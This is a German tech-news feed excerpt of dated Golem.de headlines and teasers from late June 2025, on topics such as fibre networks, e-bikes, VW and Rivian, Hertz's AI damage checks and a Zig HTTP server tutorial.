Date of publish: Mon, 30 Jun 2025 08:09:02 +0200

Telefónica Deutschland: Keiner der Glasfaserinvestoren verdient bislang Geld

Markus Haas, Chef von Telefónica Deutschland, beklagt, dass mit Glasfaser-Netzen noch kein Geld verdient werde. Zugleich vermarktet Telefónica weiter Vectoring. (Telefónica, Glasfaser)

Article link

Date of publish: Mon, 30 Jun 2025 07:28:01 +0200

Anzeige: NIS-2-Anforderungen in bestehende ISMS integrieren

Die EU-Richtlinie NIS 2 erhöht die Verantwortung für Cybersicherheit. Der Workshop zeigt, wie sich regulatorische Vorgaben in ISMS, ISO 27001 und IT-Grundschutz integrieren lassen. (Golem Karrierewelt, Unternehmenssoftware)

Article link

Date of publish: Mon, 30 Jun 2025 07:00:02 +0200

Anzeige: Sommer 2025: 25 Prozent Rabatt auf E-Learning für IT-Profis

Vom 21. Juni bis 21. September bietet die Golem Karrierewelt 25 Prozent Rabatt auf zahlreiche Kurse und E-Learning-Pakete - ideal für alle, die digitale Kompetenzen gezielt und selbsbestimmt ausbauen möchten. (Golem Karrierewelt, Unternehmenssoftware)

Article link

Date of publish: Sun, 29 Jun 2025 18:00:02 +0200

E-Rennrad: TQ stellt ultraleichten E-Bike-Motor vor

Der deutsche Hersteller TQ hat ein neues Motorsystem für E-Bikes vorgestellt, das mit nur 1,17 Kilogramm als besonders leicht beworben wird. (E-Bike, Mobilität)

Article link

Date of publish: Sun, 29 Jun 2025 12:00:02 +0200

Signify und Smart Home: Alexa kann mehre Philips-Hue-Bridges steuern

Wer mehrere Philips-Hue-Bridges nutzt, muss einiges tun, damit die vollständige Alexa-Steuerung funktioniert. Der Aufwand hält sich in Grenzen. (Hue, Smart Home)

Article link

Date of publish: Sun, 29 Jun 2025 11:45:02 +0200

Beteiligung wird ausgebaut: VW zahlt Rivian zweite Milliarden-Spritze

Technik von Rivian soll Volkswagen helfen, seine Softwareprobleme zu lösen. Dafür erhöhen die Wolfsburger jetzt ihren Anteil am Partner. (VW, Elektroauto)

Article link

Date of publish: Sun, 29 Jun 2025 11:30:02 +0200

Deutsche Bahn: ICE-Testzug erreicht Rekordgeschwindigkeit

Ein ICE-Testzug der Deutschen Bahn hat auf der Strecke zwischen Erfurt und Leipzig/Halle eine neue Höchstgeschwindigkeit erreicht. (Deutsche Bahn, Mobilitätskonzepte)

Article link

Date of publish: Sun, 29 Jun 2025 11:15:01 +0200

Autovermietung nutzt KI: Hertz-Kunde verärgert über automatische Schadenserkennung

Der Autovermieter Hertz nutzt ein KI-System, um Schäden am Mietwagen zu erkennen. Das führt bei Kunden zu Frust. (Autovermietung, Auto)

Article link

Date of publish: Sun, 29 Jun 2025 11:00:02 +0200

Urlaub im Funkloch: Viele Campingplätze in Deutschland mit Netzlücken

Wer Campingurlaub in Deutschland macht, muss sich auf Funklöcher einstellen. Das gilt für die Hälfte der beliebtesten Campingplätze. (Mobilfunk, Telekom)

Article link

Date of publish: Sun, 29 Jun 2025 10:40:02 +0200

Protest: Aktivisten beschmieren Tesla-Autohaus an Musks Geburtstag

Der Tesla-Shop in Berlin ist nicht zum ersten Mal Ziel einer Protestaktion. Allgemein hat die Kritik an Elon Musk weltweit zugenommen. (Tesla, Elektroauto)

Article link

Date of publish: Sun, 29 Jun 2025 10:15:01 +0200

(g+) Zig: HTTP-Server in Zig von Grund auf

Mit wenig Code zu einem HTTP-Server: Unsere Schritt-für-Schritt-Anleitung zeigt, wie das geht und vermittelt Basiswissen zur modernen C-Alternative Zig. Eine Anleitung von Michael Lohr (Programmiersprachen, Computer)

Article link

Date of publish: Sun, 29 Jun 2025 10:00:01 +0200